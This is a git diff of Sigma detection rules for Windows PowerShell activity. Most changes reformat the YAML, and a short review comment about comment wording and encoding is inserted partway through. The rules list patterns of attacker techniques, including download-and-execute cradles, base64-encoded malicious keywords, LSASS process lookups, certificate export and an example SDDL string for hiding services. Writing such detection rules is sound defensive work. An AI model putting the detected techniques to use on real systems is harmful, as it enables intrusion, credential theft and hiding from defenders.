@@ -20,15 +19,15 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection1: - CommandLine|contains|all: + CommandLine|contains|all: - ' -name IEHarden ' - ' -value 0 ' selection2: - CommandLine|contains|all: + CommandLine|contains|all: - ' -name DEPOff ' - ' -value 1 ' selection3: - CommandLine|contains|all: + CommandLine|contains|all: - ' -name DisableFirstRunCustomize ' - ' -value 2 ' condition: process_creation and (1 of selection*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_dll_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_dll_execution.yml index 812591adc..aa19745c4 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_dll_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_dll_execution.yml @@ -1,8 +1,7 @@ title: Potential PowerShell Execution Via DLL id: 6812a10b-60ea-420c-832f-dfcc33b646ba status: test -description: Detects potential PowerShell execution from a DLL instead of the usual - PowerShell process as seen used in PowerShdll +description: Detects potential PowerShell execution from a DLL instead of the usual PowerShell process as seen used in PowerShdll references: - https://github.com/p3nt4/PowerShdll/blob/62cfa172fb4e1f7f4ac00ca942685baeb88ff356/README.md author: Markus Neis, Nasreddine Bencherchali @@ -20,18 +19,18 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \rundll32.exe - - \regsvcs.exe - - \InstallUtil.exe - - \regasm.exe - - OriginalFileName: - - RUNDLL32.EXE - - RegSvcs.exe - - InstallUtil.exe - - RegAsm.exe + - Image|endswith: + - \rundll32.exe + - \regsvcs.exe + - \InstallUtil.exe + - \regasm.exe + - OriginalFileName: + - RUNDLL32.EXE + - RegSvcs.exe + - InstallUtil.exe + - RegAsm.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - Default.GetString - FromBase64String - Invoke-Expression 
diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_downgrade_attack.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_downgrade_attack.yml index 17d2a51f5..3b33e274c 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_downgrade_attack.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_downgrade_attack.yml @@ -1,11 +1,10 @@ title: Potential PowerShell Downgrade Attack id: b3512211-c67e-4707-bedc-66efc7848863 related: - - id: 6331d09b-4785-4c13-980f-f96661356249 - type: derived + - id: 6331d09b-4785-4c13-980f-f96661356249 + type: derived status: test -description: Detects PowerShell downgrade attack by comparing the host versions with - the actually used engine version 2.0 +description: Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0 references: - http://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/ - https://github.com/r00t-3xp10it/hacking-material-books/blob/43cb1e1932c16ff1f58b755bc9ab6b096046853f/obfuscation/simple_obfuscation.md#bypass-or-avoid-amsi-by-version-downgrade- @@ -26,7 +25,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \powershell.exe - CommandLine|contains: + CommandLine|contains: - ' -version 2 ' - ' -versio 2 ' - ' -versi 2 ' diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_download_com_cradles.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_download_com_cradles.yml index 9c0788e05..71ea4581f 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_download_com_cradles.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_download_com_cradles.yml 
@@ -1,11 +1,10 @@ title: Potential COM Objects Download Cradles Usage - Process Creation id: 02b64f1b-3f33-4e67-aede-ef3b0a5a8fcf related: - - id: 3c7d1587-3b13-439f-9941-7d14313dbdfe - type: similar + - id: 3c7d1587-3b13-439f-9941-7d14313dbdfe + type: similar status: test -description: Detects usage of COM objects that can be abused to download files in - PowerShell by CLSID +description: Detects usage of COM objects that can be abused to download files in PowerShell by CLSID references: - https://learn.microsoft.com/en-us/dotnet/api/system.type.gettypefromclsid?view=net-7.0 - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=57 @@ -23,9 +22,9 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_1: - CommandLine|contains: '[Type]::GetTypeFromCLSID(' + CommandLine|contains: '[Type]::GetTypeFromCLSID(' selection_2: - CommandLine|contains: + CommandLine|contains: - 0002DF01-0000-0000-C000-000000000046 - F6D90F16-9C73-11D3-B32E-00C04F990BB4 - F5078F35-C551-11D3-89B9-0000F81FE221 diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_download_cradles.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_download_cradles.yml index 889a2cb7e..339e1b748 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_download_cradles.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_download_cradles.yml @@ -21,7 +21,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: + CommandLine|contains: - .DownloadString( - .DownloadFile( - 'Invoke-WebRequest ' diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_download_dll.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_download_dll.yml index d452d355e..a96c5e33a 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_download_dll.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_download_dll.yml 
@@ -1,8 +1,7 @@ title: Potential DLL File Download Via PowerShell Invoke-WebRequest id: 0f0450f3-8b47-441e-a31b-15a91dc243e2 status: experimental -description: Detects potential DLL files being downloaded using the PowerShell Invoke-WebRequest - cmdlet +description: Detects potential DLL files being downloaded using the PowerShell Invoke-WebRequest cmdlet references: - https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution author: Florian Roth (Nextron Systems), Hieu Tran @@ -21,10 +20,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: + CommandLine|contains: - 'Invoke-WebRequest ' - 'IWR ' - CommandLine|contains|all: + CommandLine|contains|all: - http - OutFile - .dll diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_download_iex.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_download_iex.yml index 70551f157..489c85219 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_download_iex.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_download_iex.yml @@ -20,13 +20,13 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_download: - CommandLine|contains: + CommandLine|contains: - .DownloadString( - .DownloadFile( - 'Invoke-WebRequest ' - 'iwr ' selection_iex: - CommandLine|contains: + CommandLine|contains: - ;iex $ - '| IEX' - '|IEX ' @@ -39,7 +39,6 @@ detection: - Invoke-Expression condition: process_creation and (all of selection_*) falsepositives: - - Some PowerShell installers were seen using similar combinations. Apply filters - accordingly + - Some PowerShell installers were seen using similar combinations. Apply filters accordingly level: high ruletype: Sigma 
diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_download_patterns.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_download_patterns.yml index 11c1b1c4c..d96b3351d 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_download_patterns.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_download_patterns.yml @@ -1,11 +1,10 @@ title: PowerShell Download Pattern id: 3b6ab547-8ec2-4991-b9d2-2b06702a48d7 related: - - id: e6c54d94-498c-4562-a37c-b469d8e9a275 - type: derived + - id: e6c54d94-498c-4562-a37c-b469d8e9a275 + type: derived status: test -description: Detects a Powershell process that contains download commands in its command - line string +description: Detects a Powershell process that contains download commands in its command line string author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro date: 2019/01/16 modified: 2023/01/26 @@ -21,18 +20,18 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll + - Image|endswith: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - new-object - net.webclient). - download - CommandLine|contains: + CommandLine|contains: - string( - file( condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_email_exfil.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_email_exfil.yml index 6a63adfde..040100798 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_email_exfil.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_email_exfil.yml 
@@ -21,7 +21,7 @@ detection: Image|endswith: - \powershell.exe - \pwsh.exe - CommandLine|contains|all: + CommandLine|contains|all: - Add-PSSnapin - Get-Recipient - -ExpandProperty diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_enable_susp_windows_optional_feature.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_enable_susp_windows_optional_feature.yml index c1e2f427a..c11a889e5 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_enable_susp_windows_optional_feature.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_enable_susp_windows_optional_feature.yml @@ -1,16 +1,12 @@ title: Potential Suspicious Windows Feature Enabled - ProcCreation id: c740d4cf-a1e9-41de-bb16-8a46a4f57918 related: - - id: 55c925c1-7195-426b-a136-a9396800e29b - type: similar + - id: 55c925c1-7195-426b-a136-a9396800e29b + type: similar status: test -description: 'Detects usage of the built-in PowerShell cmdlet "Enable-WindowsOptionalFeature" - used as a Deployment Image Servicing and Management tool. - - Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, - and update features and packages in Windows images - - ' +description: | + Detects usage of the built-in PowerShell cmdlet "Enable-WindowsOptionalFeature" used as a Deployment Image Servicing and Management tool. + Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images references: - https://docs.microsoft.com/en-us/powershell/module/dism/enable-windowsoptionalfeature?view=windowsserver2022-ps - https://learn.microsoft.com/en-us/windows/win32/projfs/enabling-windows-projected-file-system 
@@ -28,12 +24,13 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_cmd: - CommandLine|contains|all: + CommandLine|contains|all: - Enable-WindowsOptionalFeature - -Online - -FeatureName selection_feature: - CommandLine|contains: + # Add any insecure/unusual windows features that you don't use in your environment + CommandLine|contains: - TelnetServer - Internet-Explorer-Optional-amd64 - TFTP diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_encode.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_encode.yml index a9a01d6a4..e90b89999 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_encode.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_encode.yml @@ -24,14 +24,14 @@ detection: Image|endswith: - \powershell.exe - \pwsh.exe - CommandLine|contains: + CommandLine|contains: - ' -e ' - ' -en ' - ' -enc ' - ' -enco' - ' -ec ' filter_encoding: - CommandLine|contains: ' -Encoding ' + CommandLine|contains: ' -Encoding ' filter_azure: ParentImage|contains: - C:\Packages\Plugins\Microsoft.GuestConfiguration.ConfigurationforWindows\ diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_encoded_cmd_patterns.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_encoded_cmd_patterns.yml index 03d1801a4..58a212c5d 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_encoded_cmd_patterns.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_encoded_cmd_patterns.yml 
@@ -1,8 +1,7 @@ title: Suspicious PowerShell Encoded Command Patterns id: b9d9cc83-380b-4ba3-8d8f-60c0e7e2930c status: test -description: Detects PowerShell command line patterns in combincation with encoded - commands that often appear in malware infection chains +description: Detects PowerShell command line patterns in combincation with encoded commands that often appear in malware infection chains references: - https://app.any.run/tasks/b9040c63-c140-479b-ad59-f1bb56ce7a97/ author: Florian Roth (Nextron Systems) @@ -20,20 +19,20 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.Exe - - pwsh.dll + - Image|endswith: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.Exe + - pwsh.dll selection_flags: - CommandLine|contains: + CommandLine|contains: - ' -e ' - ' -en ' - ' -enc ' - ' -enco' selection_encoded: - CommandLine|contains: + CommandLine|contains: - ' JAB' - ' SUVYI' - ' SQBFAFgA' @@ -47,7 +46,6 @@ detection: - \gc_worker.exe condition: process_creation and (all of selection_* and not 1 of filter_*) falsepositives: - - Other tools that work with encoded scripts in the command line instead of script - files + - Other tools that work with encoded scripts in the command line instead of script files level: high ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_encoded_obfusc.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_encoded_obfusc.yml index 206fd570b..7bd5af23a 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_encoded_obfusc.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_encoded_obfusc.yml 
@@ -1,8 +1,7 @@ title: Suspicious Obfuscated PowerShell Code id: 8d01b53f-456f-48ee-90f6-bc28e67d4e35 status: test -description: Detects suspicious UTF16 and base64 encoded and often obfuscated PowerShell - code often used in command lines +description: Detects suspicious UTF16 and base64 encoded and often obfuscated PowerShell code often used in command lines references: - https://app.any.run/tasks/fcadca91-3580-4ede-aff4-4d2bf809bf99/ author: Florian Roth (Nextron Systems) @@ -19,13 +18,18 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: + CommandLine|contains: + # -bxor 0x - IAAtAGIAeABvAHIAIAAwAHgA - AALQBiAHgAbwByACAAMAB4A - gAC0AYgB4AG8AcgAgADAAeA + # .Invoke() | - AC4ASQBuAHYAbwBrAGUAKAApACAAfAAg - AuAEkAbgB2AG8AawBlACgAKQAgAHwAI - ALgBJAG4AdgBvAGsAZQAoACkAIAB8AC + # {1}{0}" -f + # {0}{3}" -f + # {2}{0}" -f - AHsAMQB9AHsAMAB9ACIAIAAtAGYAI - B7ADEAfQB7ADAAfQAiACAALQBmAC - AewAxAH0AewAwAH0AIgAgAC0AZgAg @@ -35,6 +39,9 @@ detection: - AHsAMgB9AHsAMAB9ACIAIAAtAGYAI - B7ADIAfQB7ADAAfQAiACAALQBmAC - AewAyAH0AewAwAH0AIgAgAC0AZgAg + # {1}{0}' -f + # {0}{3}' -f + # {2}{0}' -f - AHsAMQB9AHsAMAB9ACcAIAAtAGYAI - B7ADEAfQB7ADAAfQAnACAALQBmAC - AewAxAH0AewAwAH0AJwAgAC0AZgAg diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_encoding_patterns.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_encoding_patterns.yml index bd8b7309a..8f945dea0 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_encoding_patterns.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_encoding_patterns.yml 
@@ -1,11 +1,10 @@ title: Potential Encoded PowerShell Patterns In CommandLine id: cdf05894-89e7-4ead-b2b0-0a5f97a90f2f related: - - id: 5b572dcf-254b-425c-a8c5-d9af6bea35a6 - type: similar + - id: 5b572dcf-254b-425c-a8c5-d9af6bea35a6 + type: similar status: test -description: Detects specific combinations of encoding methods in PowerShell via the - commandline +description: Detects specific combinations of encoding methods in PowerShell via the commandline references: - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=65 author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton @@ -25,14 +24,14 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll + - Image|endswith: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll selection_to_1: - CommandLine|contains: + CommandLine|contains: - ToInt - ToDecimal - ToByte @@ -40,20 +39,19 @@ detection: - ToSingle - ToSByte selection_to_2: - CommandLine|contains: + CommandLine|contains: - ToChar - ToString - String selection_gen_1: - CommandLine|contains|all: + CommandLine|contains|all: - char - join selection_gen_2: - CommandLine|contains|all: + CommandLine|contains|all: - split - join - condition: process_creation and (selection_img and (all of selection_to_* or 1 - of selection_gen_*)) + condition: process_creation and (selection_img and (all of selection_to_* or 1 of selection_gen_*)) falsepositives: - Unknown level: low diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_exec_data_file.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_exec_data_file.yml index 0d4ca7054..897a4e2c2 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_exec_data_file.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_exec_data_file.yml 
@@ -18,18 +18,18 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_exec: - CommandLine|contains: + CommandLine|contains: - 'iex ' - 'Invoke-Expression ' - 'Invoke-Command ' - 'icm ' selection_read: - CommandLine|contains: + CommandLine|contains: - 'cat ' - 'get-content ' - 'type ' selection_raw: - CommandLine|contains: ' -raw' + CommandLine|contains: ' -raw' condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_export_certificate.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_export_certificate.yml index ede811e7d..f7ddc96a8 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_export_certificate.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_export_certificate.yml @@ -1,12 +1,10 @@ title: Certificate Exported Via PowerShell id: 9e716b33-63b2-46da-86a4-bd3c3b9b5dfb related: - - id: aa7a3fce-bef5-4311-9cc1-5f04bb8c308c - type: similar + - id: aa7a3fce-bef5-4311-9cc1-5f04bb8c308c + type: similar status: experimental -description: Detects calls to cmdlets that are used to export certificates from the - local certificate store. Threat actors were seen abusing this to steal private - keys from compromised machines. +description: Detects calls to cmdlets that are used to export certificates from the local certificate store. Threat actors were seen abusing this to steal private keys from compromised machines. references: - https://us-cert.cisa.gov/ncas/analysis-reports/ar21-112a - https://docs.microsoft.com/en-us/powershell/module/pki/export-pfxcertificate 
@@ -27,12 +25,11 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: + CommandLine|contains: - 'Export-PfxCertificate ' - 'Export-Certificate ' condition: process_creation and selection falsepositives: - - Legitimate certificate exports by administrators. Additional filters might be - required. + - Legitimate certificate exports by administrators. Additional filters might be required. level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_frombase64string.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_frombase64string.yml index 63e8fdf3e..6e8972b1d 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_frombase64string.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_frombase64string.yml @@ -1,8 +1,7 @@ title: Base64 Encoded PowerShell Command Detected id: e32d4572-9826-4738-b651-95fa63747e8a status: test -description: Detects usage of the "FromBase64String" function in the commandline which - is used to decode a base64 encoded string +description: Detects usage of the "FromBase64String" function in the commandline which is used to decode a base64 encoded string references: - https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639 author: Florian Roth (Nextron Systems) @@ -22,7 +21,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: ::FromBase64String( + CommandLine|contains: ::FromBase64String( condition: process_creation and selection falsepositives: - Administrative script libraries diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_frombase64string_archive.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_frombase64string_archive.yml index 17a9c10c4..4ee423b6b 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_frombase64string_archive.yml 
+++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_frombase64string_archive.yml @@ -1,11 +1,10 @@ title: Suspicious FromBase64String Usage On Gzip Archive - Process Creation id: d75d6b6b-adb9-48f7-824b-ac2e786efe1f related: - - id: df69cb1d-b891-4cd9-90c7-d617d90100ce - type: similar + - id: df69cb1d-b891-4cd9-90c7-d617d90100ce + type: similar status: test -description: Detects attempts of decoding a base64 Gzip archive via PowerShell. This - technique is often used as a method to load malicious content into memory afterward. +description: Detects attempts of decoding a base64 Gzip archive via PowerShell. This technique is often used as a method to load malicious content into memory afterward. references: - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=43 author: frack113 @@ -22,7 +21,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - FromBase64String - MemoryStream - H4sI diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_get_clipboard.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_get_clipboard.yml index 31d8aaaed..22065771e 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_get_clipboard.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_get_clipboard.yml @@ -1,8 +1,8 @@ title: PowerShell Get-Clipboard Cmdlet Via CLI id: b9aeac14-2ffd-4ad3-b967-1354a4e628c3 related: - - id: 4cbd4f12-2e22-43e3-882f-bff3247ffb78 - type: derived + - id: 4cbd4f12-2e22-43e3-882f-bff3247ffb78 + type: derived status: test description: Detects usage of the 'Get-Clipboard' cmdlet via CLI references: @@ -23,7 +23,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: Get-Clipboard + CommandLine|contains: Get-Clipboard condition: process_creation and selection falsepositives: - Unknown 
diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_get_localgroup_member_recon.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_get_localgroup_member_recon.yml index 1d6ca447e..023dc04e6 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_get_localgroup_member_recon.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_get_localgroup_member_recon.yml @@ -1,11 +1,10 @@ title: Suspicious Reconnaissance Activity Using Get-LocalGroupMember Cmdlet id: c8a180d6-47a3-4345-a609-53f9c3d834fc related: - - id: cef24b90-dddc-4ae1-a09a-8764872f69fc - type: similar + - id: cef24b90-dddc-4ae1-a09a-8764872f69fc + type: similar status: test -description: Detects suspicious reconnaissance command line activity on Windows systems - using the PowerShell Get-LocalGroupMember Cmdlet +description: Detects suspicious reconnaissance command line activity on Windows systems using the PowerShell Get-LocalGroupMember Cmdlet references: - https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/ author: Nasreddine Bencherchali (Nextron Systems) 
@@ -18,21 +17,23 @@ logsource: category: process_creation product: windows detection: + # Covers group and localgroup flags process_creation: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_cmdlet: - CommandLine|contains: 'Get-LocalGroupMember ' + CommandLine|contains: 'Get-LocalGroupMember ' selection_group: - CommandLine|contains: + CommandLine|contains: + # Add more groups for other languages - domain admins - - ' administrator' - - ' administrateur' + - ' administrator' # Typo without an 'S' so we catch both + - ' administrateur' # Typo without an 'S' so we catch both - enterprise admins - Exchange Trusted Subsystem - Remote Desktop Users - - "Utilisateurs du Bureau \xE0 distance" - - Usuarios de escritorio remoto + - Utilisateurs du Bureau à distance # French for "Remote Desktop Users" + - Usuarios de escritorio remoto # Spanish for "Remote Desktop Users" condition: process_creation and (all of selection_*) fields: - CommandLine diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_getprocess_lsass.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_getprocess_lsass.yml index 9ef5cbeb7..fd52aeb07 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_getprocess_lsass.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_getprocess_lsass.yml @@ -1,8 +1,7 @@ title: PowerShell Get-Process LSASS id: b2815d0d-7481-4bf0-9b6c-a4c48a94b349 status: test -description: Detects a "Get-Process" cmdlet and it's aliases on lsass process, which - is in almost all cases a sign of malicious activity +description: Detects a "Get-Process" cmdlet and it's aliases on lsass process, which is in almost all cases a sign of malicious activity references: - https://twitter.com/PythonResponder/status/1385064506049630211 author: Florian Roth (Nextron Systems) 
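Review bot: The comment `# Typo without an 'S' so we catch both` on the ` administrator` and ` administrateur` entries calls a deliberate truncation a typo, which invites a later maintainer to "fix" it by appending the s and silently narrow the match to the plural form only. Suggest `# Deliberately without the trailing 's' so both 'administrator(s)' and 'administrateur(s)' match` on the two lines instead. The same hunk replaces the escaped `"Utilisateurs du Bureau \xE0 distance"` with the bare accented character; that is equivalent only if the rule file is written and read as UTF-8, so the converter and consumer should be confirmed to handle it that way, otherwise the French group name stops matching without any error.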
@@ -20,7 +19,8 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: + CommandLine|contains: + # You can add more permutation as you see fit - Get-Process lsas - ps lsas - gps lsas diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_hidden_b64_cmd.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_hidden_b64_cmd.yml index 5a626b3e0..c6b85b0ef 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_hidden_b64_cmd.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_hidden_b64_cmd.yml @@ -1,8 +1,7 @@ title: Malicious Base64 Encoded PowerShell Keywords in Command Lines id: f26c6093-6f14-4b12-800f-0fcb46f5ffd0 status: test -description: Detects base64 encoded strings used in hidden malicious PowerShell command - lines +description: Detects base64 encoded strings used in hidden malicious PowerShell command lines references: - http://www.leeholmes.com/blog/2017/09/21/searching-for-content-in-base-64-strings/ author: John Lambert (rule) @@ -20,16 +19,16 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll + - Image|endswith: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll selection_hidden: - CommandLine|contains: ' hidden ' + CommandLine|contains: ' hidden ' selection_encoded: - CommandLine|contains: + CommandLine|contains: - AGkAdABzAGEAZABtAGkAbgAgAC8AdAByAGEAbgBzAGYAZQByA - aXRzYWRtaW4gL3RyYW5zZmVy - IAaQB0AHMAYQBkAG0AaQBuACAALwB0AHIAYQBuAHMAZgBlAHIA diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_hide_services_via_set_service.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_hide_services_via_set_service.yml index ed3496ccf..837023641 100644 
--- a/sigma/sysmon/process_creation/proc_creation_win_powershell_hide_services_via_set_service.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_hide_services_via_set_service.yml @@ -1,14 +1,12 @@ title: Abuse of Service Permissions to Hide Services Via Set-Service id: 514e4c3a-c77d-4cde-a00f-046425e2301e related: - - id: a537cfc3-4297-4789-92b5-345bfd845ad0 - type: derived - - id: 953945c5-22fe-4a92-9f8a-a9edc1e522da - type: similar + - id: a537cfc3-4297-4789-92b5-345bfd845ad0 + type: derived + - id: 953945c5-22fe-4a92-9f8a-a9edc1e522da + type: similar status: test -description: Detects usage of the "Set-Service" powershell cmdlet to configure a new - SecurityDescriptor that allows a service to be hidden from other utilities such - as "sc.exe", "Get-Service"...etc. (Works only in powershell 7) +description: Detects usage of the "Set-Service" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as "sc.exe", "Get-Service"...etc. (Works only in powershell 7) references: - https://twitter.com/Alh4zr3d/status/1580925761996828672 - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/set-service?view=powershell-7.2 @@ -28,14 +26,15 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \pwsh.exe - - OriginalFileName: pwsh.dll + - Image|endswith: \pwsh.exe + - OriginalFileName: pwsh.dll selection_sddl: - CommandLine|contains|all: + # Example would be: "D:(D;;DCLCWPDTSD;;;IU)(D;;DCLCWPDTSD;;;SU)(D;;DCLCWPDTSD;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)" + CommandLine|contains|all: - 'Set-Service ' - DCLCWPDTSD selection_cmdlet: - CommandLine|contains: + CommandLine|contains: - '-SecurityDescriptorSddl ' - '-sd ' condition: process_creation and (all of selection_*) 
